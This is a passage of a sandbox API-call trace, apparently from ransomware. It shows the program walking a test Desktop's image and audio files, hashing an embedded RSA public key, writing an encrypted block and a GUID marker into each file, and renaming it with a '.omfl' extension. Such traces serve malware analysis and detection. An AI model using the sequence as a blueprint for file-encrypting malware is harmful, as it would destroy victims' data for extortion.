lpNumberOfBytesRead=0xe00fb70*=0x111e2, lpOverlapped=0x0) returned 1 [0130.585] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.585] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.585] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.585] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.585] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.586] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.586] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.586] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.586] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.586] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.586] GetLastError () returned 0x0 [0130.587] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.587] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.587] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.587] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.587] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.587] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.587] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.587] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.588] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x111e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.588] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.588] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.588] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.589] CloseHandle (hObject=0x5c8) returned 1 [0130.591] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.591] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.592] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nhmxaszbT2mam.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nhmxaszbt2mam.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nhmxaszbT2mam.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nhmxaszbt2mam.png.omfl")) returned 1 [0130.594] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5c800d0, ftCreationTime.dwHighDateTime=0x1d5dbfd, ftLastAccessTime.dwLowDateTime=0x6facbf10, ftLastAccessTime.dwHighDateTime=0x1d5dbc5, ftLastWriteTime.dwLowDateTime=0x6facbf10, ftLastWriteTime.dwHighDateTime=0x1d5dbc5, nFileSizeHigh=0x0, nFileSizeLow=0xfd2b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="njgPixeHAgDVD.bmp", cAlternateFileName="NJGPIX~1.BMP")) returned 1 [0130.594] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.594] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.594] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njgPixeHAgDVD.bmp") returned=".bmp" [0130.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njgPixeHAgDVD.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njgpixehagdvd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.594] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=64811) returned 1 [0130.594] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.597] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xfd05, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.597] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.598] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.598] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xfd2b, lpOverlapped=0x0) returned 1 [0130.599] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.599] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.599] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.599] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.599] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.600] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.600] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.600] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.600] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.600] GetLastError () returned 0x0 [0130.600] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.600] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.600] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.600] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.600] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.601] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.601] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.601] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.602] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xfd2b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.602] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.602] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.602] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.602] CloseHandle (hObject=0x5c8) returned 1 [0130.604] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.604] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.604] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njgPixeHAgDVD.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njgpixehagdvd.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njgPixeHAgDVD.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njgpixehagdvd.bmp.omfl")) returned 1 [0130.606] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a8680, ftCreationTime.dwHighDateTime=0x1d5e262, ftLastAccessTime.dwLowDateTime=0x62606740, ftLastAccessTime.dwHighDateTime=0x1d5daf7, ftLastWriteTime.dwLowDateTime=0x62606740, ftLastWriteTime.dwHighDateTime=0x1d5daf7, nFileSizeHigh=0x0, nFileSizeLow=0x141a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nwzAbp1Poqclx f0.m4a", cAlternateFileName="NWZABP~1.M4A")) returned 1 [0130.606] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.606] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.606] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nwzAbp1Poqclx f0.m4a") returned=".m4a" [0130.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nwzAbp1Poqclx f0.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nwzabp1poqclx f0.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.606] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=82341) returned 1 [0130.606] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.610] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x1417f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.610] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.611] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.611] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.611] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.611] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x141a5, lpOverlapped=0x0) returned 1 [0130.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.612] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.612] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.613] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.613] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.613] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.613] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.613] GetLastError () returned 0x0 [0130.613] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.613] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.613] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.613] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.613] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.613] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.613] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.613] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x141b0) returned 0xdd2c688 [0130.614] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.614] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf3160 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c50 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf31a8 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c68 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c98 [0130.614] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16cb0 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.615] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c98 | out: hHeap=0x4970000) returned 1 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cb0 | out: hHeap=0x4970000) returned 1 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16cb0 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16c98 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.615] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cb0 | out: hHeap=0x4970000) returned 1 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c98 | out: hHeap=0x4970000) returned 1 [0130.615] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.616] GetCurrentThreadId () returned 0x618 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5fb0 [0130.616] RtlAllocateHeap 